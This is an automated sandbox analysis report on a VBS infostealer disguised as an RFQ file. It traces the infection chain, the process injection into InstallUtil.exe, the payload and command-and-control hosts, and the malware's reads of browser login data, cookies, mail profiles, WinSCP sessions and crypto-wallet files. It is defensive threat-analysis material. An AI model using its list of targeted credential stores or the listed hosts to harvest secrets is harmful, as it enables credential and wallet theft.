                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformationJump to behavior
                      Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8184, type: MEMORYSTR
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Electrumk
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectronCash
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Jaxx Liberty!
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002947000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q3C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: ElectrumLTC
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002947000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q0C:\Users\user\AppData\Roaming\Ethereum\keystore
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Exodus
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002947000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: $^q<C:\Users\user\AppData\Roaming\Binance\Local Storage\leveldb
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: Ethereum
                      Source: InstallUtil.exe, 00000008.00000002.2063750110.0000000002947000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: `,^q5C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                      Source: RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2042987541.0000000009650000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: set_UseMachineKeyStore
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Bitcoin\Bitcoin-QtJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                      Source: Yara matchFile source: 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8184, type: MEMORYSTR

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: Process Memory Space: InstallUtil.exe PID: 8184, type: MEMORYSTR
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity Information21
                      Scripting
                      Valid Accounts141
                      Windows Management Instrumentation
                      21
                      Scripting
                      1
                      DLL Side-Loading
                      1
                      Disable or Modify Tools
                      1
                      OS Credential Dumping
                      2
                      File and Directory Discovery
                      Remote Services1
                      Archive Collected Data
                      1
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts2
                      Command and Scripting Interpreter
                      1
                      DLL Side-Loading
                      211
                      Process Injection
                      3
                      Obfuscated Files or Information
                      1
                      Credentials in Registry
                      34
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      11
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain Accounts1
                      PowerShell
                      Logon Script (Windows)Logon Script (Windows)1
                      DLL Side-Loading
                      Security Account Manager1
                      Query Registry
                      SMB/Windows Admin Shares1
                      Email Collection
                      1
                      Non-Standard Port
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                      Masquerading
                      NTDS131
                      Security Software Discovery
                      Distributed Component Object Model1
                      Clipboard Data
                      2
                      Non-Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script51
                      Virtualization/Sandbox Evasion
                      LSA Secrets1
                      Process Discovery
                      SSHKeylogging113
                      Application Layer Protocol
                      Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts211
                      Process Injection
                      Cached Domain Credentials51
                      Virtualization/Sandbox Evasion
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync1
                      Application Window Discovery
                      Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1591736 Sample: RFQ_43200046412000086500125.vbs Startdate: 15/01/2025 Architecture: WINDOWS Score: 100 28 coloscolorado.duckdns.org 2->28 30 35.37.15.0.in-addr.arpa 2->30 32 cud-senegal.org 2->32 38 Suricata IDS alerts for network traffic 2->38 40 Malicious sample detected (through community Yara rule) 2->40 42 Yara detected Discord Token Stealer 2->42 46 5 other signatures 2->46 8 wscript.exe 1 2->8         started        signatures3 44 Uses dynamic DNS services 28->44 process4 signatures5 56 Malicious encrypted Powershell command line found 8->56 58 Windows Scripting host queries suspicious COM object (likely to drop second stage) 8->58 60 Creates processes via WMI 8->60 11 RFQ_43200046412000086500125.vbs.exe 15 16 8->11         started        15 cmd.exe 2 8->15         started        process6 dnsIp7 36 cud-senegal.org 51.159.14.89, 443, 49730 OnlineSASFR France 11->36 62 Found many strings related to Crypto-Wallets (likely being stolen) 11->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 11->64 66 Writes to foreign memory regions 11->66 68 4 other signatures 11->68 18 InstallUtil.exe 3 11->18         started        22 conhost.exe 11->22         started        26 C:\...\RFQ_43200046412000086500125.vbs.exe, PE32 15->26 dropped 24 conhost.exe 15->24         started        file8 signatures9 process10 dnsIp11 34 coloscolorado.duckdns.org 194.226.169.227, 49737, 49738, 9910 PKTRU Russian Federation 18->34 48 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->48 50 Tries to steal Mail credentials (via file / registry access) 18->50 52 Found many strings related to Crypto-Wallets (likely being stolen) 18->52 54 2 other signatures 18->54 signatures12

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      RFQ_43200046412000086500125.vbs8%ReversingLabs
                      SourceDetectionScannerLabelLink
                      C:\Users\user\Desktop\RFQ_43200046412000086500125.vbs.exe0%ReversingLabs
                      No Antivirus matches
                      No Antivirus matches
                      SourceDetectionScannerLabelLink
                      https://cud-senegal.org0%Avira URL Cloudsafe
                      https://cud-senegal.org/post-postlogin/Agfdatq.mp40%Avira URL Cloudsafe
                      NameIPActiveMaliciousAntivirus DetectionReputation
                      cud-senegal.org
                      51.159.14.89
                      truefalse
                        high
                        coloscolorado.duckdns.org
                        194.226.169.227
                        truetrue
                          unknown
                          35.37.15.0.in-addr.arpa
                          unknown
                          unknowntrue
                            unknown
                            NameMaliciousAntivirus DetectionReputation
                            https://cud-senegal.org/post-postlogin/Agfdatq.mp4false
                            • Avira URL Cloud: safe
                            unknown
                            NameSourceMaliciousAntivirus DetectionReputation
                            https://aka.ms/Vh5j3kuwscript.exe, 00000000.00000003.1752480716.0000026411A5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1766974031.0000026411A5D000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2tInstallUtil.exe, 00000008.00000002.2063750110.0000000002ADC000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://nuget.org/NuGet.exeRFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://stackoverflow.com/q/14436606/23354RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.0000000005606000.00000004.00000800.00020000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002541000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://github.com/mgravell/protobuf-netJRFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.000000000364C000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://pesterbdd.com/images/Pester.pngRFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.apache.org/licenses/LICENSE-2.0.htmlRFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://contoso.com/LicenseRFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://discordapp.com/api/v9/users/InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              https://contoso.com/IconRFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://github.com/mgravell/protobuf-netRFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016InstallUtil.exe, 00000008.00000002.2085803769.0000000007B71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085803769.0000000008EF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085410253.00000000069F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002A84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17InstallUtil.exe, 00000008.00000002.2087150967.0000000009E71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085803769.0000000007B71000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085803769.0000000008EF8000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002ADC000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2071800372.00000000036E6000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2085410253.00000000069F1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.0000000002A84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brInstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://github.com/Pester/PesterRFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          https://support.mozilla.org/products/firefoxInstallUtil.exe, 00000008.00000002.2063750110.0000000002761000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://aka.ms/odirmwscript.exe, 00000000.00000003.1752480716.0000026411A5D000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1766974031.0000026411A5D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              high
                                                              https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17$=InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://github.com/mgravell/protobuf-netiRFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://aka.ms/pscore6lBRFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000052A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://stackoverflow.com/q/11564914/23354;RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://stackoverflow.com/q/2152978/23354RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2045039920.0000000009990000.00000004.08000000.00040000.00000000.sdmp, RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.0000000006DFD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contoso.com/RFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://icanhazip.com/InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            https://nuget.org/nuget.exeRFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2024331201.000000000630D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://steamcommunity.com/profiles/InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000008.00000002.2063750110.000000000282E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_idInstallUtil.exe, 00000008.00000002.2063750110.0000000002A84000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016$=InstallUtil.exe, 00000008.00000002.2063750110.0000000002624000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000052A1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://cud-senegal.orgRFQ_43200046412000086500125.vbs.exe, 00000003.00000002.2011025718.00000000053F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: safe
                                                                                      unknown
                                                                                      • No. of IPs < 25%
                                                                                      • 25% < No. of IPs < 50%
                                                                                      • 50% < No. of IPs < 75%
                                                                                      • 75% < No. of IPs
                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                      194.226.169.227
                                                                                      coloscolorado.duckdns.orgRussian Federation
                                                                                      60837PKTRUtrue
                                                                                      51.159.14.89
                                                                                      cud-senegal.orgFrance
                                                                                      12876OnlineSASFRfalse
                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                      Analysis ID:1591736
                                                                                      Start date and time:2025-01-15 11:37:07 +01:00
                                                                                      Joe Sandbox product:CloudBasic
                                                                                      Overall analysis duration:0h 6m 12s
                                                                                      Hypervisor based Inspection enabled:false
                                                                                      Report type:full
                                                                                      Cookbook file name:default.jbs
                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                      Number of analysed new started processes analysed:9
                                                                                      Number of new started drivers analysed:0
                                                                                      Number of existing processes analysed:0
                                                                                      Number of existing drivers analysed:0
                                                                                      Number of injected processes analysed:0
                                                                                      Technologies:
                                                                                      • HCA enabled
                                                                                      • EGA enabled
                                                                                      • AMSI enabled
                                                                                      Analysis Mode:default
                                                                                      Analysis stop reason:Timeout
                                                                                      Sample name:RFQ_43200046412000086500125.vbs
                                                                                      Detection:MAL
                                                                                      Classification:mal100.bank.troj.spyw.evad.winVBS@8/5@3/2
                                                                                      EGA Information:
                                                                                      • Successful, ratio: 100%
                                                                                      HCA Information:
                                                                                      • Successful, ratio: 92%
                                                                                      • Number of executed functions: 507
                                                                                      • Number of non-executed functions: 42
                                                                                      Cookbook Comments:
                                                                                      • Found application associated with file extension: .vbs
                                                                                      • Stop behavior analysis, all processes terminated
                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, SIHClient.exe, conhost.exe
                                                                                      • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                      • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                      • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                      TimeTypeDescription
                                                                                      05:38:07API Interceptor41x Sleep call for process: RFQ_43200046412000086500125.vbs.exe modified
                                                                                      05:38:33API Interceptor33x Sleep call for process: InstallUtil.exe modified
                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      194.226.169.227Kopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zipGet hashmaliciousUnknownBrowse
                                                                                        51.159.14.89TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                          TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                            TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                              TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  cud-senegal.orgTiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 51.159.14.89
                                                                                                  TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 51.159.14.89
                                                                                                  TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 51.159.14.89
                                                                                                  TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 51.159.14.89
                                                                                                  TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 51.159.14.89
                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                  PKTRUKopia p#U0142atno#U015bci_Santander_TF1903218545300000564290004.zipGet hashmaliciousUnknownBrowse
                                                                                                  • 194.226.169.227
                                                                                                  OnlineSASFRhttp://www.bordeaux-doc.com/ville_de_rochefort/Roch/LR/Boya-uk.htmGet hashmaliciousUnknownBrowse
                                                                                                  • 62.210.16.62
                                                                                                  tTbeoLWNhb.dllGet hashmaliciousWannacryBrowse
                                                                                                  • 163.172.72.249
                                                                                                  sUlHfYQxNw.dllGet hashmaliciousWannacryBrowse
                                                                                                  • 51.159.121.1
                                                                                                  TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 51.159.14.89
                                                                                                  TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 51.159.14.89
                                                                                                  TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 51.159.14.89
                                                                                                  TiOWA908TP.exeGet hashmaliciousUnknownBrowse
                                                                                                  • 51.159.14.89
